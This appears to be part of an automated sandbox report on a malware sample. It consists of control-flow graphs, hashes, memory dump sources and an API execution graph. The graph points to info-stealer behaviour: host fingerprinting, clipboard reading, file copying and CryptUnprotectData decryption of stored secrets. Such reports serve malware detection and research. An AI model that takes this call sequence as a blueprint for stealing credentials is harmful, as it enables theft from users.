                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 22f8b671e26ba0a9070784dc4c0b17e62edeadf117a85b167df69a630e7b22a7
                                                                                                        • Instruction ID: 80e93d3e8506192c6bb2a5ffa4fb5bdfe7631622b3eda0f0f8b2dc57a00e3342
                                                                                                        • Opcode Fuzzy Hash: 22f8b671e26ba0a9070784dc4c0b17e62edeadf117a85b167df69a630e7b22a7
                                                                                                        • Instruction Fuzzy Hash: FB116AB1D002488FCB20DFAAC4457EEFBF4EB88324F20881AD459A7610DB75A544CFA5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 537 4e56528-4e56597 ResumeThread 540 4e565a0-4e565c5 537->540 541 4e56599-4e5659f 537->541 541->540
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1737336790.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_4e50000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 3a347c19ff7a537244e1f713959a8487ba8a169510c97396c3fbc2491f6132af
                                                                                                        • Instruction ID: 4a5edd8836acf13a3c593d4589f431b07b6daa822a9846b38636fb591e5f5faa
                                                                                                        • Opcode Fuzzy Hash: 3a347c19ff7a537244e1f713959a8487ba8a169510c97396c3fbc2491f6132af
                                                                                                        • Instruction Fuzzy Hash: DF116AB1D002488FCB20DFAAC4457DEFBF4EB88324F208819C459A7210DB74A544CF94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 545 7912581-79125c5 547 7912709-7912755 545->547 548 79125cb-79125d0 545->548 554 79128a6-79128ec 547->554 555 791275b-7912760 547->555 549 79125d2-79125d8 548->549 550 79125e8-79125f4 548->550 552 79125da 549->552 553 79125dc-79125e6 549->553 560 79126b6-79126c0 550->560 561 79125fa-79125fd 550->561 552->550 553->550 572 79128f2-79128f7 554->572 573 7912b4a-7912b7c 554->573 558 7912762-7912768 555->558 559 7912778-791277c 555->559 565 791276a 558->565 566 791276c-7912776 558->566 562 7912782-7912784 559->562 563 7912856-7912860 559->563 567 79126c2-79126cb 560->567 568 79126ce-79126d4 560->568 561->560 569 7912603-791260a 561->569 570 79127c7 562->570 571 7912786-7912797 562->571 574 7912862-791286b 563->574 575 791286e-7912874 563->575 565->559 566->559 576 79126d6-79126d8 568->576 577 79126da-79126e6 568->577 569->547 578 7912610-7912615 569->578 581 79127c9-79127cb 570->581 571->554 601 791279d-79127a5 571->601 582 79128f9-79128ff 572->582 583 791290f-7912913 572->583 610 7912bb5-7912bbf 573->610 611 7912b7e-7912b9b 573->611 586 7912876-7912878 575->586 587 791287a-7912886 575->587 585 79126e8-7912706 576->585 577->585 579 7912617-791261d 578->579 580 791262d-7912631 578->580 590 7912621-791262b 579->590 591 791261f 579->591 580->560 594 7912637-7912639 580->594 581->563 597 79127d1-79127d3 581->597 598 7912901 582->598 599 7912903-791290d 582->599 592 7912af2-7912afc 583->592 593 7912919-791291d 583->593 588 7912888-79128a3 586->588 587->588 590->580 591->580 602 7912b0a-7912b10 592->602 603 7912afe-7912b07 592->603 606 791295d 593->606 607 791291f-7912930 593->607 594->560 609 791263b 594->609 604 79127d5-79127db 597->604 605 79127ed-79127f9 597->605 598->583 599->583 616 79127a7-79127ad 601->616 617 79127bd-79127c5 601->617 620 7912b12-7912b14 602->620 621 7912b16-7912b22 602->621 618 79127dd 604->618 619 79127df-79127eb 604->619 640 7912811-7912853 605->640 641 79127fb-7912801 605->641 623 791295f-7912961 606->623 607->573 642 7912936-791293b 607->642 632 7912642-7912644 609->632 613 7912bc1-7912bc5 610->613 614 7912bc8-7912bce 610->614 645 7912c05-7912c0a 611->645 646 7912b9d-7912baf 611->646 624 7912bd0-7912bd2 614->624 625 7912bd4-7912be0 614->625 626 79127b1-79127bb 616->626 627 79127af 616->627 617->581 618->605 619->605 628 7912b24-7912b47 620->628 621->628 623->592 634 7912967-791296d 623->634 636 7912be2-7912c02 624->636 625->636 626->617 627->617 643 7912646-791264c 632->643 644 791265c-79126b3 632->644 634->592 635 7912973-7912980 634->635 647 7912a16-7912a55 635->647 648 7912986-791298b 635->648 652 7912803 641->652 653 7912805-7912807 641->653 654 7912953-791295b 642->654 655 791293d-7912943 642->655 656 7912650-7912652 643->656 657 791264e 643->657 645->646 646->610 684 7912a5c-7912a60 647->684 660 79129a3-79129b9 648->660 661 791298d-7912993 648->661 652->640 653->640 654->623 664 7912945 655->664 665 7912947-7912951 655->665 656->644 657->644 660->647 674 79129bb-79129db 660->674 666 7912995 661->666 667 7912997-79129a1 661->667 664->654 665->654 666->660 667->660 678 79129f5-7912a14 674->678 679 79129dd-79129e3 674->679 678->684 680 79129e5 679->680 681 79129e7-79129f3 679->681 680->678 681->678 686 7912a83 684->686 687 7912a62-7912a6b 684->687 691 7912a86-7912a92 686->691 689 7912a72-7912a7f 687->689 690 7912a6d-7912a70 687->690 692 7912a81 689->692 690->692 694 7912a98-7912aef 691->694 692->691
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7910000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q
                                                                                                        • API String ID: 0-1614139903
                                                                                                        • Opcode ID: 3cd99a4f9fe30617b353de38d61e8612d3d633a2b529107aefd2d9e6bceb6dab
                                                                                                        • Instruction ID: 2c7c6ba44d7277b8c950fd3b963d76dbcfead3731846902b1d7b41f159fff106
                                                                                                        • Opcode Fuzzy Hash: 3cd99a4f9fe30617b353de38d61e8612d3d633a2b529107aefd2d9e6bceb6dab
                                                                                                        • Instruction Fuzzy Hash: 9221B0F0B0470ACFCB14EF25C584A66BBF8BF46298F1580ABC408CB1A1D730D8A5CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1736669008.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 78d1eb1c021e47d6c1b2d69d0f722425b8a813c3d2bf7a3e5bcfa7ed9a54ecff
                                                                                                        • Instruction ID: 0f091ade02ca5b2f6b43c600355d6a354872f8a6189131dc6fc9b14feaa64665
                                                                                                        • Opcode Fuzzy Hash: 78d1eb1c021e47d6c1b2d69d0f722425b8a813c3d2bf7a3e5bcfa7ed9a54ecff
                                                                                                        • Instruction Fuzzy Hash: D3018C6240D3C09FDB128B259C94752BFB8EF57224F0D85CBE8888F1A3D2699C45C772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1736669008.000000000314D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0314D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_314d000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ef898a87acce164fe39d584bc222141bd95416e385b81e17233d422c9fbba23a
                                                                                                        • Instruction ID: da3dc3f8c7911dc3dd3a9c331592549e87d3c79f91ddfc8ba1f143dc8f9ceb88
                                                                                                        • Opcode Fuzzy Hash: ef898a87acce164fe39d584bc222141bd95416e385b81e17233d422c9fbba23a
                                                                                                        • Instruction Fuzzy Hash: B401F7310093009BEB10CA25D984767FF98DF49324F1CC56AED484B147C779D882C6B1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000005.00000002.1745060325.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_5_2_7910000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                        • API String ID: 0-2049395529
                                                                                                        • Opcode ID: c4a21448f26fff2fbcf82a090028f294b0c2bb5b5ad3f29c9bd6795e04a37005
                                                                                                        • Instruction ID: 8d048034c7dc1ee26d16a8ead1f4a4ca6252384462185fbaa45137e22fcb932e
                                                                                                        • Opcode Fuzzy Hash: c4a21448f26fff2fbcf82a090028f294b0c2bb5b5ad3f29c9bd6795e04a37005
                                                                                                        • Instruction Fuzzy Hash: DE01D42274E38D6FC32B86692820166AFB65F8391032A45EBC140CF39BCD558D5AC3B3

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:61.6%
                                                                                                        Total number of Nodes:310
                                                                                                        Total number of Limit Nodes:9
                                                                                                        execution_graph 13439 42d7e3 13440 42d7ee 13439->13440 13443 437c10 13440->13443 13445 437c30 13443->13445 13444 42d7fc 13447 437cae 13445->13447 13452 43c1f0 LdrInitializeThunk 13445->13452 13447->13444 13449 437d2e 13447->13449 13451 43c1f0 LdrInitializeThunk 13447->13451 13449->13444 13453 43c1f0 LdrInitializeThunk 13449->13453 13451->13449 13452->13447 13453->13444 13290 40c583 CoInitializeSecurity 13454 43c767 13456 43c790 13454->13456 13455 43c80e 13456->13455 13458 43c1f0 LdrInitializeThunk 13456->13458 13458->13455 13459 43cce6 13460 43cd00 13459->13460 13462 43cd6e 13460->13462 13466 43c1f0 LdrInitializeThunk 13460->13466 13465 43c1f0 LdrInitializeThunk 13462->13465 13464 43ce4d 13465->13464 13466->13462 13291 43c58a 13292 43c460 13291->13292 13292->13292 13293 43c5f4 13292->13293 13296 43c1f0 LdrInitializeThunk 13292->13296 13295 43c54d 13296->13295 13467 4217ab 13468 4217d0 13467->13468 13468->13468 13469 4218a0 3 API calls 13468->13469 13470 42180b 13469->13470 13471 4218a0 3 API calls 13470->13471 13472 42182a 13471->13472 13473 430469 CoSetProxyBlanket 13297 43c2c8 13298 43c2e0 13297->13298 13298->13298 13299 43ccaf GetForegroundWindow 13298->13299 13300 43ccbe 13299->13300 13474 42e4a9 13476 42e4cd 13474->13476 13475 42e5cb FreeLibrary 13476->13475 13476->13476 13301 40d38e 13302 40d3b0 13301->13302 13305 437df0 13302->13305 13304 40d4e2 13304->13304 13306 437e10 CoCreateInstance 13305->13306 13308 438042 SysAllocString 13306->13308 13309 438440 13306->13309 13312 4380e7 13308->13312 13311 438450 GetVolumeInformationW 13309->13311 13317 438471 13311->13317 13313 43842f SysFreeString 13312->13313 13314 4380ef CoSetProxyBlanket 13312->13314 13313->13309 13315 438425 13314->13315 13316 43810f SysAllocString 13314->13316 13315->13313 13319 438200 13316->13319 13317->13304 13317->13317 13319->13319 13320 438237 SysAllocString 13319->13320 13321 43825b 13320->13321 13322 438413 SysFreeString SysFreeString 13321->13322 13323 438409 13321->13323 13324 4382a3 VariantInit 13321->13324 13322->13315 13323->13322 13326 4382f0 13324->13326 13325 4383f8 VariantClear 13325->13323 13326->13325 13327 42c84d 13329 42c880 13327->13329 13328 42c97e 13329->13328 13331 43c1f0 LdrInitializeThunk 13329->13331 13331->13328 13332 408850 13334 40885f 13332->13334 13333 408acf ExitProcess 13334->13333 13335 408ab8 13334->13335 13336 40891c GetCurrentProcessId GetCurrentThreadId 13334->13336 13345 43c160 13335->13345 13337 408941 13336->13337 13338 408945 SHGetSpecialFolderPathW GetForegroundWindow 13336->13338 13337->13338 13340 408a3d 13338->13340 13340->13335 13344 40c550 CoInitializeEx 13340->13344 13348 43d7f0 13345->13348 13347 43c165 FreeLibrary 13347->13333 13349 43d7f9 13348->13349 13349->13347 13350 42da53 13356 43dbf0 13350->13356 13352 42da63 GetComputerNameExA 13353 42dac0 GetComputerNameExA 13352->13353 13355 42db90 13353->13355 13355->13355 13357 421853 13358 421860 13357->13358 13361 4218a0 13358->13361 13362 4218b7 13361->13362 13377 43e340 13362->13377 13364 42191d 13373 421880 13364->13373 13381 43aa80 13364->13381 13366 4219fc 13371 43aa80 RtlAllocateHeap 13366->13371 13374 421ff5 13366->13374 13385 43c1f0 LdrInitializeThunk 13366->13385 13386 43aaa0 13366->13386 13367 421963 13367->13366 13384 43c1f0 LdrInitializeThunk 13367->13384 13369 43aaa0 RtlFreeHeap 13370 422007 13369->13370 13370->13373 13390 43c1f0 LdrInitializeThunk 13370->13390 13371->13366 13374->13369 13379 43e360 13377->13379 13378 43e4be 13378->13364 13379->13378 13391 43c1f0 LdrInitializeThunk 13379->13391 13392 43d810 13381->13392 13383 43aa8a RtlAllocateHeap 13383->13367 13384->13367 13385->13366 13387 43aab3 13386->13387 13388 43aac4 13386->13388 13389 43aab8 RtlFreeHeap 13387->13389 13388->13366 13389->13388 13390->13370 13391->13378 13393 43d830 13392->13393 13393->13383 13393->13393 13477 4214b0 13478 4214be 13477->13478 13480 421510 13477->13480 13478->13478 13481 4215d0 13478->13481 13482 4215e0 13481->13482 13485 43e510 13482->13485 13484 4216df 13487 43e530 13485->13487 13486 43e68e 13486->13484 13487->13486 13489 43c1f0 LdrInitializeThunk 13487->13489 13489->13486 13394 43aad0 13395 43aaf0 13394->13395 13396 43ab2e 13395->13396 13404 43c1f0 LdrInitializeThunk 13395->13404 13397 43ace1 13396->13397 13399 43aa80 RtlAllocateHeap 13396->13399 13402 43abbd 13399->13402 13400 43ac0e 13401 43aaa0 RtlFreeHeap 13400->13401 13401->13397 13402->13400 13405 43c1f0 LdrInitializeThunk 13402->13405 13404->13396 13405->13400 13490 40d835 13492 40d71d 13490->13492 13491 40d8e2 13492->13490 13492->13491 13494 43c1f0 LdrInitializeThunk 13492->13494 13494->13492 13406 415799 13407 41579e 13406->13407 13416 43e6e0 13407->13416 13409 4157b7 13411 4157f8 13409->13411 13420 43e7d0 13409->13420 13415 4158fe 13411->13415 13426 43c1f0 LdrInitializeThunk 13411->13426 13413 415bc6 13414 415b95 CryptUnprotectData 13414->13413 13415->13413 13415->13414 13418 43e700 13416->13418 13417 43e77e 13417->13409 13418->13417 13427 43c1f0 LdrInitializeThunk 13418->13427 13421 43e800 13420->13421 13424 43e87f 13421->13424 13428 43c1f0 LdrInitializeThunk 13421->13428 13422 43e94e 13422->13411 13424->13422 13429 43c1f0 LdrInitializeThunk 13424->13429 13426->13415 13427->13417 13428->13424 13429->13422 13495 40c679 13496 40c690 13495->13496 13499 40c6de 13496->13499 13589 43c1f0 LdrInitializeThunk 13496->13589 13497 40c75e 13515 423860 13497->13515 13499->13497 13590 43c1f0 LdrInitializeThunk 13499->13590 13502 40c7cd 13524 423f20 13502->13524 13504 40c7ed 13540 4241c0 13504->13540 13506 40c80d 13558 425e30 13506->13558 13512 40c83f 13591 4329c0 13512->13591 13517 4238b0 13515->13517 13516 4218a0 3 API calls 13522 4239b4 13516->13522 13519 43e510 LdrInitializeThunk 13517->13519 13520 423ac1 13517->13520 13517->13522 13523 423c77 13517->13523 13518 423c61 GetLogicalDrives 13521 43e510 LdrInitializeThunk 13518->13521 13519->13520 13520->13518 13520->13520 13520->13522 13520->13523 13521->13523 13522->13502 13523->13516 13523->13522 13530 423fb0 13524->13530 13525 424198 13525->13504 13527 4240af 13603 41f7a0 13527->13603 13528 42439c 13617 43eca0 13528->13617 13530->13525 13530->13527 13530->13528 13607 43efb0 13530->13607 13533 424404 13535 43eb60 LdrInitializeThunk 13533->13535 13536 424ffa 13533->13536 13537 424f30 13533->13537 13631 43f330 13533->13631 13535->13533 13536->13536 13641 43c1f0 LdrInitializeThunk 13537->13641 13541 4241d0 13540->13541 13542 43eb60 LdrInitializeThunk 13541->13542 13545 424078 13542->13545 13543 43efb0 3 API calls 13543->13545 13544 424198 13544->13506 13545->13543 13545->13544 13546 42439c 13545->13546 13547 4240af 13545->13547 13548 43eca0 3 API calls 13546->13548 13549 41f7a0 3 API calls 13547->13549 13550 4243cb 13548->13550 13549->13544 13551 43eb60 LdrInitializeThunk 13550->13551 13553 424404 13550->13553 13551->13553 13552 43eb60 LdrInitializeThunk 13552->13553 13553->13552 13554 424ffa 13553->13554 13555 424f30 13553->13555 13556 43f330 3 API calls 13553->13556 13554->13554 13649 43c1f0 LdrInitializeThunk 13555->13649 13556->13553 13563 425e5c 13558->13563 13559 43efb0 3 API calls 13559->13563 13561 43eb60 LdrInitializeThunk 13561->13563 13562 40c82d 13567 4266d0 13562->13567 13563->13559 13563->13561 13563->13562 13563->13563 13565 43eca0 3 API calls 13563->13565 13566 43c1f0 LdrInitializeThunk 13563->13566 13650 43c180 13563->13650 13662 43f720 13563->13662 13565->13563 13566->13563 13568 4266f0 13567->13568 13569 42674e 13568->13569 13674 43c1f0 LdrInitializeThunk 13568->13674 13570 40c836 13569->13570 13571 43aa80 RtlAllocateHeap 13569->13571 13577 426b50 13570->13577 13574 4267c9 13571->13574 13573 43aaa0 RtlFreeHeap 13573->13570 13576 42683e 13574->13576 13675 43c1f0 LdrInitializeThunk 13574->13675 13576->13573 13579 426b59 13577->13579 13578 426b64 13578->13512 13579->13578 13676 438c50 13579->13676 13581 4273e2 13581->13512 13582 43e340 LdrInitializeThunk 13586 4273b8 13582->13586 13583 43e6e0 LdrInitializeThunk 13583->13586 13584 4275c2 CopyFileW 13584->13586 13585 43e7d0 LdrInitializeThunk 13585->13586 13586->13581 13586->13582 13586->13583 13586->13584 13586->13585 13587 427795 13586->13587 13683 43c1f0 LdrInitializeThunk 13587->13683 13589->13499 13590->13497 13685 414400 13591->13685 13593 4329ce OpenClipboard 13594 4329f0 13593->13594 13595 40c891 13594->13595 13596 4329fb GetClipboardData 13594->13596 13597 432b73 CloseClipboard 13596->13597 13598 432a16 GlobalLock 13596->13598 13597->13595 13600 432a35 13598->13600 13599 432b62 GlobalUnlock 13599->13597 13601 432a73 GetWindowLongW 13600->13601 13602 432a45 13600->13602 13601->13602 13602->13599 13604 41f7d0 13603->13604 13604->13604 13605 4218a0 3 API calls 13604->13605 13606 41f7f9 13605->13606 13606->13525 13608 43efd0 13607->13608 13609 43f04e 13608->13609 13642 43c1f0 LdrInitializeThunk 13608->13642 13610 43f31c 13609->13610 13611 43aa80 RtlAllocateHeap 13609->13611 13610->13530 13613 43f0d4 13611->13613 13616 43f17e 13613->13616 13643 43c1f0 LdrInitializeThunk 13613->13643 13614 43aaa0 RtlFreeHeap 13614->13610 13616->13614 13619 43ecc0 13617->13619 13618 43ed3e 13620 43aa80 RtlAllocateHeap 13618->13620 13625 4243cb 13618->13625 13619->13618 13644 43c1f0 LdrInitializeThunk 13619->13644 13623 43edc3 13620->13623 13622 43aaa0 RtlFreeHeap 13622->13625 13626 43ee6e 13623->13626 13645 43c1f0 LdrInitializeThunk 13623->13645 13625->13533 13627 43eb60 13625->13627 13626->13622 13628 43eb80 13627->13628 13629 43ec6e 13628->13629 13646 43c1f0 LdrInitializeThunk 13628->13646 13629->13533 13632 43f360 13631->13632 13633 43f3de 13632->13633 13647 43c1f0 LdrInitializeThunk 13632->13647 13634 43f712 13633->13634 13635 43aa80 RtlAllocateHeap 13633->13635 13634->13533 13638 43f46b 13635->13638 13637 43aaa0 RtlFreeHeap 13637->13634 13640 43f50e 13638->13640 13648 43c1f0 LdrInitializeThunk 13638->13648 13640->13637 13640->13640 13641->13525 13642->13609 13643->13616 13644->13618 13645->13626 13646->13629 13647->13633 13648->13640 13649->13544 13651 43c1d0 13650->13651 13652 43c1ba 13650->13652 13653 43c1d6 13650->13653 13654 43c198 13650->13654 13656 43c1a6 13650->13656 13661 43c1c0 13650->13661 13658 43aaa0 RtlFreeHeap 13651->13658 13657 43aa80 RtlAllocateHeap 13652->13657 13655 43aaa0 RtlFreeHeap 13653->13655 13654->13651 13654->13653 13654->13656 13654->13661 13659 43c1df 13655->13659 13660 43c1ab RtlReAllocateHeap 13656->13660 13657->13661 13658->13653 13660->13661 13661->13563 13663 43f731 13662->13663 13664 43f8ae 13663->13664 13672 43c1f0 LdrInitializeThunk 13663->13672 13665 43fb29 13664->13665 13667 43aa80 RtlAllocateHeap 13664->13667 13665->13563 13668 43f92c 13667->13668 13670 43fa29 13668->13670 13673 43c1f0 LdrInitializeThunk 13668->13673 13669 43aaa0 RtlFreeHeap 13669->13665 13670->13669 13672->13664 13673->13670 13674->13569 13675->13576 13680 438c80 13676->13680 13677 43eb60 LdrInitializeThunk 13677->13680 13678 43efb0 3 API calls 13678->13680 13679 438db8 13679->13586 13680->13677 13680->13678 13680->13679 13681 43f720 3 API calls 13680->13681 13684 43c1f0 LdrInitializeThunk 13680->13684 13681->13680 13683->13581 13684->13680 13685->13593 13436 433cdf 13437 433d04 GetSystemMetrics GetSystemMetrics 13436->13437 13438 433d43 13437->13438

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 437df0-437e0f 1 437e10-437e24 0->1 1->1 2 437e26-437e34 1->2 3 437e40-437e54 2->3 3->3 4 437e56-437e97 3->4 5 437ea0-437ec5 4->5 5->5 6 437ec7-437ede 5->6 8 437f92-437f9f 6->8 9 437ee4-437eef 6->9 11 437fa0-437fe0 8->11 10 437ef0-437f22 9->10 10->10 12 437f24-437f37 10->12 11->11 13 437fe2-43803c CoCreateInstance 11->13 16 437f40-437f82 12->16 14 438042-43807b 13->14 15 438440-43846f call 43dbf0 GetVolumeInformationW 13->15 17 438080-4380bc 14->17 22 438471-438475 15->22 23 438479-43847b 15->23 16->16 19 437f84-437f8e 16->19 17->17 20 4380be-4380e9 SysAllocString 17->20 19->8 26 43842f-43843c SysFreeString 20->26 27 4380ef-438109 CoSetProxyBlanket 20->27 22->23 25 43848d-438494 23->25 28 4384a0-4384b6 25->28 29 438496-43849d 25->29 26->15 31 438425-43842b 27->31 32 43810f-438121 27->32 30 4384c0-4384f0 28->30 29->28 30->30 33 4384f2-43852b 30->33 31->26 34 438130-438177 32->34 35 438530-438573 33->35 34->34 36 438179-4381f2 SysAllocString 34->36 35->35 37 438575-4385a5 call 41e5c0 35->37 38 438200-438235 36->38 42 4385b0-4385b8 37->42 38->38 40 438237-438261 SysAllocString 38->40 45 438413-438423 SysFreeString * 2 40->45 46 438267-438289 40->46 42->42 44 4385ba-4385bc 42->44 47 4385c2-4385d2 call 4081b0 44->47 48 438480-438487 44->48 45->31 52 438409-43840f 46->52 53 43828f-438292 46->53 47->48 48->25 50 4385d7-4385de 48->50 52->45 53->52 55 438298-43829d 53->55 55->52 56 4382a3-4382ef VariantInit 55->56 57 4382f0-438319 56->57 57->57 58 43831b-43832d 57->58 59 438331-438333 58->59 60 438339-43833f 59->60 61 4383f8-438405 VariantClear 59->61 60->61 62 438345-438353 60->62 61->52 63 438355-43835a 62->63 64 43838d 62->64 66 43836c-438370 63->66 65 43838f-4383b7 call 408020 call 408d50 64->65 77 4383b9 65->77 78 4383be-4383ca 65->78 68 438372-43837b 66->68 69 438360 66->69 72 438382-438386 68->72 73 43837d-438380 68->73 71 438361-43836a 69->71 71->65 71->66 72->71 74 438388-43838b 72->74 73->71 74->71 77->78 79 4383d1-4383f4 call 408050 call 408030 78->79 80 4383cc 78->80 79->61 80->79
                                                                                                        APIs
                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                        • API String ID: 2573436264-1397720406
                                                                                                        • Opcode ID: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                        • Opcode Fuzzy Hash: cd14e05d7432ded1bf926f32cda1f224496113c88b4519bc978cba4cd539789a
                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 91 423860-4238af 92 4238b0-4238ed 91->92 92->92 93 4238ef-423936 92->93 95 423940-423968 93->95 95->95 96 42396a-423975 95->96 97 4239d2-4239da 96->97 98 4239b4 96->98 99 423ae4-423af0 96->99 100 423ad4-423adb 96->100 101 4239c5-4239d1 96->101 102 423cb5-423d5b 96->102 103 423c9a 96->103 104 423c88-423c92 96->104 105 42397c-423981 96->105 106 4239bc-4239c2 call 408030 96->106 109 4239e3 97->109 110 4239dc-4239e1 97->110 98->106 111 423af2-423af7 99->111 112 423af9 99->112 100->99 107 423d60-423da9 102->107 104->103 113 423983-423988 105->113 114 42398a 105->114 106->101 107->107 115 423dab-423dba call 4218a0 107->115 117 4239ea-423a22 call 408020 109->117 110->117 118 423b00-423ba8 call 408020 111->118 112->118 119 42398d-4239ad call 408020 113->119 114->119 124 423dbf-423dc2 115->124 128 423a30-423a5e 117->128 129 423bb0-423bff 118->129 119->97 119->98 119->99 119->100 119->101 119->102 119->103 119->104 119->106 130 423dca-423def 124->130 128->128 131 423a60-423a68 128->131 129->129 132 423c01-423c0d 129->132 136 423df0-423e0c 130->136 137 423a81-423a8e 131->137 138 423a6a-423a6f 131->138 134 423c31-423c3e 132->134 135 423c0f-423c16 132->135 142 423c40-423c44 134->142 143 423c61-423c81 GetLogicalDrives call 43e510 134->143 139 423c20-423c2f 135->139 136->136 144 423e0e-423e91 136->144 140 423a90-423a94 137->140 141 423ab1-423abc call 43e510 137->141 145 423a70-423a7f 138->145 139->134 139->139 146 423aa0-423aaf 140->146 151 423ac1-423acd 141->151 148 423c50-423c5f 142->148 143->101 143->103 143->104 143->106 143->130 154 423ca0-423ca6 call 408030 143->154 155 423f05-423f0e call 408030 143->155 156 423eff 143->156 157 423caf 143->157 150 423ea0-423ece 144->150 145->137 145->145 146->141 146->146 148->143 148->148 150->150 153 423ed0-423ef5 call 421740 150->153 151->99 151->100 151->102 151->103 151->104 151->130 151->154 153->156 154->157 156->155 157->102
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                        • API String ID: 0-1763234448
                                                                                                        • Opcode ID: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                        • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                        • Opcode Fuzzy Hash: 99fe5afda1dcc440005955b3418fa216d89817fb1a5d97e426eeaa65bb2ccc37
                                                                                                        • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
